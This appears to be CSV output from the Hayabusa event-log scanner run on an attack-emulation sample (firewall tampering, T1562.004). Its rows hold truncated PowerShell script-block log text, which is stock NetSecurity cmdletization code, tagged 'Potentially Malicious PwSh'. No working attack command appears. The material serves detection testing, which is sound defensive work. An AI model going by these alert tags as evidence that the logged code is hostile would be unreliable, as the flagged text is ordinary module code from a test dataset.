[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceType",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Filter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Filter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains 